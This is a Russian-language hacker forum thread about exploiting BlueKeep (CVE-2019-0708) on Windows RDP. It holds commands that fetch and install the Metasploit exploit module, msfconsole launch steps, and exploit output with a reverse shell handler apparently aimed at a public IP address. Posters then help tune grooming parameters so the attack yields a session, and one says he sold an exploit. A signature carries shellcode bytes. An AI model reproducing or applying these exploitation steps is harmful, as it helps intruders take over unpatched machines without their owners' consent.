CVE-2019-0708 | Remote Desktop Services RCE

unkn0wnl7 · 31.08.2019

Видел, что один парень передал всю инфу разработчикам мсф о том, как можно проэксплуатировать данную уязвимость.

когда появится, пока не известно.

Eris · 06.09.2019

I've even sold it for $ 200, only trust in them is not enough.

With 7KB size in C #, you can max write RAT to create fake video not Exploit

NyanCat · 07.09.2019

Налетайте крч

Add initial exploit for CVE-2019-0708, BlueKeep by bcook-r7 · Pull Request #12283 · rapid7/metasploit-framework

This PR adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to int...

github.com

GitHub - NAXG/cve_2019_0708_bluekeep_rce: bluekeep exploit

bluekeep exploit. Contribute to NAXG/cve_2019_0708_bluekeep_rce development by creating an account on GitHub.

github.com

CVE-2019-0708/poc at master · zerosum0x0/CVE-2019-0708

Scanner PoC for CVE-2019-0708 RDP RCE vuln. Contribute to zerosum0x0/CVE-2019-0708 development by creating an account on GitHub.

github.com

Black Diver · 07.09.2019

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.
Metasploit team releases BlueKeep exploit | ZDNet
Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

Bash:

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

Код:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

Det · 09.09.2019

Создатели меиасплойто уже виложил файли

Uzi Em · 13.09.2019

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.21:4444
[*] 91.203.174.254:3389 - Detected RDP on 91.203.174.254:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 91.203.174.254:3389 - The target is vulnerable.
[*] 91.203.174.254:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8006a00000, Channel count 1.
[*] 91.203.174.254:3389 - Surfing channels ...
[*] 91.203.174.254:3389 - Lobbing eggs ...
[-] 91.203.174.254:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

Кто-нибудь решал эту проблему ?? Помогите решить...

weaver · 13.09.2019

Uzi Em сказал(а):

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.21:4444
[*] 91.203.174.254:3389 - Detected RDP on 91.203.174.254:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 91.203.174.254:3389 - The target is vulnerable.
[*] 91.203.174.254:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8006a00000, Channel count 1.
[*] 91.203.174.254:3389 - Surfing channels ...
[*] 91.203.174.254:3389 - Lobbing eggs ...
[-] 91.203.174.254:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

Кто-нибудь решал эту проблему ?? Помогите решить...

Если сессия не создается значит не правильно указан таргет и цель уходит в BSoD.

Uzi Em · 13.09.2019

weaver сказал(а):

Если сессия не создается значит не правильно указан таргет и цель уходит в BSoD.

Цель правильно указана, там что-то с памятью
https://twitter.com/kevthehermit

If your playing with the metasploit #bluekeep CVE-2019-0708 exploit module and none of the targets work. You can use a memdump with the #rekall pools plugin to find the NPP address #dfir #memoryforensics

tabac · 13.09.2019

Uzi Em, да, там проблема с памятью
если сессия не создается, как вариант, попробуй поиграться со значениями GROOMBASE и GROOMSIZE
например, уменьши значение GROOMSIZE менее 50 и посмотри на результат
может упираться в лимиты памяти виртуалки

если не поможет, попробуй варианты виртуалки/нет и разные версии винды, там проблема очень остро стоит под Windows 7 x64

+ проставь set TARGET *

Uzi Em · 13.09.2019

tabac сказал(а):

Uzi Em, да, там проблема с памятью
если сессия не создается, как вариант, попробуй поиграться со значениями GROOMBASE и GROOMSIZE
например, уменьши значение GROOMSIZE менее 50 и посмотри на результат
может упираться в лимиты памяти виртуалки

Как это сделать ?? Если говорить о самом коде, то там пробовал брать и изменять параметр с 250 до 50, не помогало!!

tabac · 13.09.2019

проблема распространненная, целое обсуждение на гитхабе образовалось https://github.com/rapid7/metasploit-framework/pull/12283

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 30
GROOMSIZE => 30
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

пробуй значения от 10 и до 150

но говорят, что на физической машине все равно будут ошибки, только на виртуалках срабатывает

Uzi Em · 13.09.2019

tabac сказал(а):

проблема распространненная, целое обсуждение на гитхабе образовалось https://github.com/rapid7/metasploit-framework/pull/12283

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 30
GROOMSIZE => 30
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

пробуй значения от 10 и до 150

но говорят, что на физической машине все равно будут ошибки, только на виртуалках срабатывает

Оо, благодарю вижу у кого-то получалось у кого-то все равно проблемы, с физической машиной также нужно играться!

Shocker · 13.09.2019

Uzi Em сказал(а):

Оо, благодарю вижу у кого-то получалось у кого-то все равно проблемы, с физической машиной также нужно играться!

Играй сколько угодно, работать не будет, без правильного GROOMBASE. Чтоб узнать правильный, нужен доступ к машине.

Uzi Em · 13.09.2019

Shocker сказал(а):

Играй сколько угодно, работать не будет, без правильного GROOMBASE. Чтоб узнать правильный, нужен доступ к машине.

Что нет единой какой-то заточки ?

Uzi Em · 13.09.2019

Были же самописные эксплоиты под эту уязвимость, которые работали на любых машинах

Shocker · 13.09.2019

Uzi Em сказал(а):

Что нет единой какой-то заточки ?

Эксплоит в этом виде, как он сейчас, работать не будет. Только на виртуалке, к которой у тебя есть доступ, где ты сможешь получить адрес NPP. (как его получить без доступа, я лично способов не знаю)
Кто нибудь, когда нибудь, полюбому сделает, и можно будет делать без доступа. Пока что я такого не видел.
Можно только ждать.

Uzi Em · 13.09.2019

Shocker сказал(а):

Эксплоит в этом виде, как он сейчас, работать не будет. Только на виртуалке, к которой у тебя есть доступ, где ты сможешь получить адрес NPP. (как его получить без доступа, я лично способов не знаю)
Кто нибудь, когда нибудь, полюбому сделает, и можно будет делать без доступа. Пока что я такого не видел.
Можно только ждать.

Да я понял, что он сырой как океан, поэтому и выложили в паблик, что херня...
Ну щас через год все обновятся, будет в мете рабочий!

CVE-2019-0708 | Remote Desktop Services RCE

unkn0wnl7

CD-диск

Eris

CD-диск

NyanCat

RAM

Add initial exploit for CVE-2019-0708, BlueKeep by bcook-r7 · Pull Request #12283 · rapid7/metasploit-framework

GitHub - NAXG/cve_2019_0708_bluekeep_rce: bluekeep exploit

CVE-2019-0708/poc at master · zerosum0x0/CVE-2019-0708

Black Diver

CD-диск

Det

RAID-массив

Uzi Em

floppy-диск

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

Uzi Em

floppy-диск

tabac

CPU register

Uzi Em

floppy-диск

tabac

CPU register

Uzi Em

floppy-диск

Shocker

(L2) cache

Uzi Em

floppy-диск

Uzi Em

floppy-диск

Shocker

(L2) cache

Uzi Em

floppy-диск